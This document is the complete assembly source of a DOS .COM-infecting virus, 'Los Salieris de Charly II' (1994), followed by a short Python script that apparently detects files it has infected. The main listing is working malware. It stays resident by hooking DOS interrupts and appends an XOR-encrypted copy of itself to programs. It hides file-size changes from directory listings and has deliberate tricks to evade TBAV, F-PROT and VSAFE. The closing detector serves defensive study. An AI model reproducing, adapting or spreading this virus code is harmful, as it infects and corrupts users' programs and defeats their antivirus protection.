; ; Virus Los Salieris de Charly II (para compilar normal). ; (Stealth with TBAV, VSAFE, DIR, NC and MEM) ; ; Created by: Ramthes Jones'94 (For Those About to Rock!! ; (AHORA SI QUE EL TBAV ME LA CHUPA BIEN!!!) ; ; Fuente de mierda! hasta donde pensas llegar? porque estos gatos ; solo hablan en ingles... grrr! desencriptan pero no traducen. ; ; DANGER!!: What you're gonna read could be bad for your health! ; Please! try to understand... my prgs don't run... ; they creep >:-D he he he! ; CODE SEGMENT .286c ASSUME CS:CODE, DS:CODE, ES:CODE ORG 100h START: JMP COMIENZO NOP NOP NOP INT 20h COMIENZO: ONE LABEL BYTE INT 03h ; This piece o'shit's for TBAV :( ::: MOV BX,0107h PUSH BX MOV AH,0Dh ; ??? What?????????! MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) ADD SI,BX DESENCRIPTO: MOV DL,CS:[((NUMERO - OFFSET ONE) + BX)] XOR [SI],DL INC SI XOR AH,AH ; This shit's for F-PROT INT 02h ; This shit's for TBAV LOOP DESENCRIPTO JMP DESDE_ACA INT 21h MOV AX,4C00h INT 21h DESDE_ACA: MOV AX,0CACAh INT 21h CMP AX,0FEDEh JE CORRE_PROG_1 JMP CHUPAMELA CORRE_PROG_1: JMP CORRE_PROG CHUPAMELA: PUSH AX PUSH DX MOV AX,0FA01h MOV DX,5945h INT 21h POP DX POP AX MOV AH,4Ah XOR BX,BX INT 21h MOV AH,4Ah MOV BX,0FFFFh INT 21h SUB BX,101h MOV AH,4Ah INT 21h MOV AH,48h MOV BX,100h INT 21h MOV ES,AX PUSH ES DEC AX MOV ES,AX MOV ES:WORD PTR [0001h], 0008h POP ES PUSH CS POP DS POP SI PUSH SI XOR DI,DI MOV CX,OFFSET TWO - OFFSET ONE CLD REP MOVSB PUSH ES POP DS MOV AX,3521h INT 21h POP SI PUSH SI MOV DS:[INT21IP - OFFSET ONE],BX MOV DS:[INT21CS - OFFSET ONE],ES MOV AX,2521h MOV DX,(OFFSET HOOK_21 - OFFSET ONE) INT 21h MOV AH,04h INT 1Ah CMP DX,0526h JE JODE_2 CMP DX,1126h JE JODE_2 CMP DX,1021h JE JODE_2 JMP NO_JODE JODE_2: MOV AX,3513h INT 21h MOV DS:[INT17IP - OFFSET ONE],BX MOV DS:[INT17CS - OFFSET ONE],ES MOV AX,2513h MOV DX,(OFFSET HOOK_13 - OFFSET ONE) INT 21h NO_JODE: PUSH CS PUSH CS POP DS POP ES CORRE_PROG: POP BX MOV DI,100h 
LEA SI,[(NORMAL - OFFSET ONE) + BX] MOVSW MOVSB PUSH CS PUSH 0100h RETF HOOK_21 PROC FAR PUSH DS PUSHF PUSH AX PUSH BX PUSH CX PUSH DX PUSH SI PUSH DI PUSH DS PUSH ES CMP AX,0CACAh JE RESIDE CMP AH,4Bh JE INFECTA1 CMP AH,3Dh JE INFECT_FAST1 CMP AH,4Eh JE NO_NC CMP AH,4Fh JE NO_NC CMP AH, 11h JE NO_DIR CMP AH, 12h JE NO_DIR JMP FIN INFECTA1: JMP INFECTA INFECT_FAST1: JMP INFECT_FAST RESIDE: POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS MOV AX,0FEDEh IRET NO_DIR PROC POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS PUSH CX PUSH BX PUSH ES PUSH AX MOV AH,2Fh PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] POP AX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSH AX PUSHF OR AL,AL JNE FINHANDLER2 CMP BYTE PTR ES:[BX],0FFh JNE NOEXTENDED ADD BX,07h NOEXTENDED: MOV CX,ES:[BX+17h] AND CL,00011111b CMP CL,00001101b JNE FINHANDLER2 SUB WORD PTR ES:[BX+1Dh],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG SBB WORD PTR ES:[BX+1Fh],0 FINHANDLER2: POPF POP AX POP ES POP BX POP CX RETF 0002h NO_DIR ENDP NO_NC PROC POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSHF PUSH AX PUSH BX PUSH CX PUSH ES MOV AH,2Fh PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CX,ES:[BX+16h] AND CL,00011111b CMP CL,00001101b JE SI_RECUBRO JMP NO_RECUBRO SI_RECUBRO: SUB WORD PTR ES:[BX+1Ah],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG NO_RECUBRO: POP ES POP CX POP BX POP AX POPF RETF 2 NO_NC ENDP FIN_1: JMP FIN INFECT_FAST: MOV SI,DX BUCLE: CMP BYTE PTR [SI],"." 
JE YASTA CMP BYTE PTR [SI],00h JE FIN_1 INC SI JMP BUCLE YASTA: PUSH SI BUCLE2: CMP BYTE PTR [SI],"\" JE YASTA2 CMP SI,DX JNE NOSTA2 DEC SI JMP YASTA2 NOSTA2: DEC SI JMP BUCLE2 YASTA2: INC SI MOV AX,[SI] OR AX,2020h CMP AX,"oc" JNE DALEPUES INC SI INC SI MOV AX,[SI] OR AX,2020h CMP AX,"mm" JNE DALEPUES POP SI JMP FIN_1 DALEPUES: POP SI INC SI MOV AX,[SI] OR AX,2020h CMP AX,"oc" JNE FIN_1 INFECTA: PUSH AX PUSH BX PUSH DX PUSH DS PUSH ES MOV AX, CS MOV DS, AX MOV AX,3524h PUSHF CALL DWORD PTR DS:[INT21IP - OFFSET ONE] MOV DS:[INT24IP - OFFSET ONE],BX MOV DS:[INT24CS - OFFSET ONE],ES MOV AX,2524h MOV DX,(OFFSET HOOK_24 - OFFSET ONE) PUSHF CALL DWORD PTR DS:[INT21IP - OFFSET ONE] POP ES POP DS POP DX POP BX POP AX PUSH DX PUSH DX CALL REMUEVE_BITS POP DX MOV AX,4300h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX MOV AX,4301h MOV CX,20h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] JC FINAL_1 MOV AX,3D02h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSH AX POP BX MOV AH,3Fh MOV CX,2 PUSH CS POP DS MOV DX,(OFFSET NORMAL - OFFSET ONE) PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] XOR SI,SI MOV AL,CS:(NORMAL - OFFSET ONE)[SI] CMP AL,'M' JE FINAL_1 INC SI MOV AL,CS:(NORMAL - OFFSET ONE)[SI] CMP AL,'Z' JE FINAL_1 JMP CONTI FINAL_1: JMP FINAL CONTI: MOV AX,5700h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[(HORA - OFFSET ONE)],CX MOV CS:[(FECHA - OFFSET ONE)],DX AND CL,00011111b ; Esto es lo correcto para comprobar CMP CL,00001101b ; si los segundos son 26 JE FINAL_1 MOV AX,4200h CWD MOV CX,DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AH,3Fh MOV CX,3 PUSH CS POP DS MOV DX,(OFFSET NORMAL - OFFSET ONE) PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,4202h CWD MOV CX,DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] PUSH AX SUB AX,3 MOV SI,1 MOV CS:(BUFFER - OFFSET ONE)[SI],AL INC SI MOV CS:(BUFFER - OFFSET ONE)[SI],AH ; PUSH AX ;MIERDA1 MOV AH,2Ch PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV CS:[NUMERO - 
OFFSET ONE],DL PUSH BX MOV AH,48h MOV BX,150h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV ES,AX POP BX PUSH CS POP DS XOR SI,SI MOV DI,SI MOV CX,OFFSET TWO - OFFSET ONE CLD REP MOVSB PUSH ES POP DS POP AX ;LL INC AH XOR SI,SI ;LL MOV ES:[SI + 2],AL ;OPA MOV ES:[SI + 3],AH MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) ENCRIPTO: XOR [SI],DL INC SI LOOP ENCRIPTO MOV AH,40h MOV CX,OFFSET TWO - OFFSET ONE XOR DX,DX PUSH ES POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] JC FINAL MOV AH,49h PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,4200h CWD MOV CX,DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AH,40h MOV CX,3 MOV DX,(OFFSET BUFFER - OFFSET ONE) PUSH CS POP DS PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,5701h MOV CX,CS:[(HORA - OFFSET ONE)] AND CL,11100000b OR CL,00001101b MOV DX,CS:[(FECHA - OFFSET ONE)] PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] FINAL: MOV AH,3Eh PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] MOV AX,4301h MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)] POP DX PUSHF CALL DWORD PTR CS:[INT21IP - OFFSET ONE] CALL RESTAURA_BITS MOV AX,2524h MOV DX,CS:[INT24IP - OFFSET ONE] MOV DS,CS:[INT24CS - OFFSET ONE] PUSHF CALL DWORD PTR CS:[INT21IP-OFFSET ONE] FIN: POP ES POP DS POP DI POP SI POP DX POP CX POP BX POP AX POPF POP DS JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)] HOOK_21 ENDP HOOK_13 PROC PUSHF PUSH AX PUSH BX PUSH CX PUSH SI XOR BX,BX MOV SI,31 MOV CX,75 ESCRIBE: MOV AH,0Eh MOV AL,CS:(TEXTO - OFFSET ONE)[SI] INT 10h INC SI LOOP ESCRIBE POP SI POP CX POP BX POP AX POPF JMP DWORD PTR CS:[(INT17IP - OFFSET ONE)] HOOK_13 ENDP HOOK_24 PROC XOR AL,AL IRET HOOK_24 ENDP V_SAFE PROC MOV AH,0FAh MOV DX,5945h INT 21h RET V_SAFE ENDP VERIFICA_RESIDENCIA PROC XOR AL,AL CALL V_SAFE CMP BX,2F00h JE FORI STC FORI: RET VERIFICA_RESIDENCIA ENDP REMUEVE_BITS PROC CALL VERIFICA_RESIDENCIA JC FORI_1 MOV AL,02h MOV BL,00000000b CALL V_SAFE MOV CS:[SEBA-OFFSET ONE],CL FORI_1: CLC 
RET REMUEVE_BITS ENDP RESTAURA_BITS PROC CALL VERIFICA_RESIDENCIA JC FORI_2 MOV AL,02 MOV BL,CS:[SEBA-OFFSET ONE] CALL V_SAFE FORI_2: CLC RET RESTAURA_BITS ENDP INT21IP DW 0 INT21CS DW 0 INT24IP DW 0 INT24CS DW 0 INT17IP DW 0 INT17CS DW 0 ATRIBUTOS DW 0 SEBA DB 1 HORA DW 0 FECHA DW 0 BUFFER DB 3 DUP(0E9h) NORMAL DB 3 DUP(90h) TEXTO DB "VIRUS LOS SALIERIS DE CHARLY 2." DB "AIN'T A HACKER," DB "AIN'T A CRACKER," DB "I AM ONLY A MOTHERFUCKER." DB 'DEDICATED TO "MACA"' INCRIPT LABEL BYTE NUMERO DB 1 DUP(0) TWO LABEL BYTE CODE ENDS END START
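
Static triage for the file-level traits this listing leaves in an infected .COM file, as an added example that is not part of the original source: the E9 entry jump onto the appended body, the patched MOV BX immediate, the XOR-encrypted TEXTO string keyed by the final byte (NUMERO), and the 26-second timestamp stamp. The function names, the one-byte opcode encodings (CC, BB) and the inert sample builder are assumptions made for this example.

```python
import struct

MARKER = b"VIRUS LOS SALIERIS DE CHARLY 2."  # first TEXTO string in the listing
STAMP_FIELD = 0x0D                           # low 5 bits of DOS time: 13 -> 26 s

def check_com_image(data, dos_time=None):
    """Report which infection traits from the listing appear in a .COM image."""
    hits = {"entry_jmp": False, "stub_header": False,
            "xor_text": False, "timestamp": False}
    if len(data) < 8 or data[:2] == b"MZ":   # the infector itself skips MZ files
        return hits
    # BUFFER is E9 + (original_length - 3): the jump lands on the appended body.
    if data[0] == 0xE9:
        target = 3 + struct.unpack_from("<H", data, 1)[0]
        if target + 4 <= len(data):
            hits["entry_jmp"] = True
            # Body starts INT 03h / MOV BX,imm16; imm16 is patched to
            # original_length + 100h (assumed encodings: CC, then BB lo hi).
            imm = struct.unpack_from("<H", data, target + 2)[0]
            hits["stub_header"] = (data[target] == 0xCC
                                   and data[target + 1] == 0xBB
                                   and imm == (target + 0x100) & 0xFFFF)
    # NUMERO, the XOR key, is the last byte; TEXTO sits just before it, encrypted.
    key = data[-1]
    tail = bytes(b ^ key for b in data[-257:-1])
    hits["xor_text"] = MARKER in tail
    if dos_time is not None:                 # raw 16-bit DOS time word, if known
        hits["timestamp"] = (dos_time & 0x1F) == STAMP_FIELD
    return hits

def is_suspect(hits):
    """The decrypted text alone is decisive; the jump needs the stub to agree."""
    return hits["xor_text"] or (hits["entry_jmp"] and hits["stub_header"])

def constructed_sample(key=0x5A, host_len=40):
    """Inert image with the marker layout only, no virus code (constructed)."""
    host = b"\xE9" + struct.pack("<H", host_len - 3) + b"\x90" * (host_len - 3)
    stub = b"\xCC\xBB" + struct.pack("<H", host_len + 0x100) + b"\x00" * 12
    secret = bytes(b ^ key for b in b"\x00" * 16 + MARKER)
    return host + stub + secret + bytes([key])
```

The timestamp trait is weak on its own, since any file can legitimately carry a 26-second stamp; treat it as corroboration only.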